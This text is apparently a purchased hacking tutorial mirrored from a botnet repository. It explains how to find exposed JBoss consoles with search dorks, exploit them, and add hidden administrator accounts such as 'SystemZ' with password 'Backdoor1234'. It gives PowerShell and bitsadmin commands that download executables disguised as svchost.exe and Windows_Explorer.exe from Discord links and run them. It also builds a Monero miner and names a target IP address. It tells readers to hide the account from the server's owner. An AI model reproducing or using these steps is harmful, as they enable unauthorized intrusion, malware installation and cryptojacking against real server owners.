Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Exploits/JBOSS FULL/Tutorial.txt
5038 views
1
Sanku For Purchasing
2
3
1. search using the included dorks for machines that are listed by ip and a port the ports being but not limited to 8080 8000 8081 and 5555
4
2.if on linux use the python command to run this program if on windows just use the cd command to get into teh directory that the script is in and run it as if it where an exe
5
3.once you run the script you will be presented with the syntax and it states to run the commadn new.py IP as its format
6
4.run the net user commands that are also provided wiith this scraip to add your own user or to remote execute another program
7
5.use windows RDP to login to the host with the password and username set by the net user commands
8
6.start mining selling or cracking on the server as you wish
9
7.keep in mind that teh legitimate owner of the server can see your account so set the name to somthing like guest
10
11
12
Dorks
13
inurl:"jmx-console/HtmlAdaptor"
14
inurl:"/web-console/Invoker"
15
inurl:"/invoker/JMXInvokerServlet"
16
inurl:"8080/jmx-console/"
17
inurl:"console/Invoker"
18
intitle:"JMX Console"
19
intitle:"MBean Inspector"
20
intitle:JMX inurl:"/HtmlAdaptor?"
21
intitle:"JMX MBean View"
22
intitle:"JBoss JMX Management Console"
23
intitle:JBoss Console
24
intitle:Jmx Console Htmladaptor
25
inurl:"/jmx-console/" intitle:"JBoss JMX Management Console"
26
intitle:�JBoss Management Console � Server Information� �application server� inurl:�web-console�
27
intitle:"JBoss Management Console -- Server Information" "application server"
28
inurl:"/web-console/" intitle:"Administration Console"
29
inurl:�8080/jmx-console�
30
inurl:�8081/jmx-console�
31
inurl:�jmx-console�
32
intitle:"JBoss Management Console"
33
inurl:"/invoker/JMXInvokerServlet"
34
inurl:"/web-console/Invoker
35
inurl:"/web-console/ServerInfo"
36
site:br inurl:"/jmx-console/HtmlAdaptor"
37
site:uk inurl:"/jmx-console/HtmlAdaptor"
38
site:in inurl:"/jmx-console/HtmlAdaptor"
39
site:ru inurl:"/jmx-console/HtmlAdaptor"
40
site:pe inurl:"/jmx-console/HtmlAdaptor"
41
site:br inurl:"/web-console/Invoker"
42
site:uk inurl:"/web-console/Invoker"
43
site:ru inurl:"/web-console/Invoker"
44
site:us inurl:"/web-console/Invoker"
45
site:com inurl:"/web-console/Invoker"
46
inurl:"jboss.system:type=ServerInfo"
47
inurl:"jbossass.war"
48
49
PowerShell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/364455677499932686/424307504512630785/svchost.exe');Start-Process 'svchost.exe'
50
51
cat /proc/cpuinfo
52
53
https://lolekhosted.net/
54
55
lscpu
56
57
# apt-get update
58
# apt-get install libcurl4-openssl-dev git
59
# apt-get install build-essential autotools-dev autoconf libcurl3 libcurl4-gnutls-dev
60
# mkdir /download
61
# cd /downloads
62
# git clone https://github.com/wolf9466/cpuminer-...
63
# cd cpuminer-multi
64
# ./autogen.sh
65
# CFLAGS="-march=native" ./configure
66
# make
67
# make install
68
# minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u [email protected] -p x
69
70
Add user commands
71
net users SystemZ Backdoor1234 /add
72
net user LulZ SystemZ321 /ADD
73
net localgroup administrators SystemZ /add
74
75
76
bitsadmin /transfer myDownloadJob /download /priority high https://cdn.discordapp.com/attachments/364455677499932686/426301760345210880/Windows_Explorer.exe %SystemRoot%\Windows_Explorer.exe
77
cd %SystemRoot%
78
Windows_Explorer.exe
79
80
bitsadmin /transfer myDownloadJob /download /priority high https://cdn.discordapp.com/attachments/364455677499932686/392494650717634561/update.exe %SystemRoot%\update.exe
81
82
83
84
bitsadmin /transfer myDownloadJob /download /priority high https://cdn.discordapp.com/attachments/364455677499932686/424307504512630785/svchost.exe %SystemRoot%\svchost.exe
85
cd %SystemRoot%
86
svchost.exe
87
88
89
90
bitsadmin /transfer myDownloadJob /download /priority high https://cdn.discordapp.com/attachments/364455677499932686/389053867717033994/imminent.exe %SystemRoot%\imminent.exe
91
92
Note the given commands result in a username of SystemZ with the password Backdoor1234
93
94
112.199.118.125:8080
95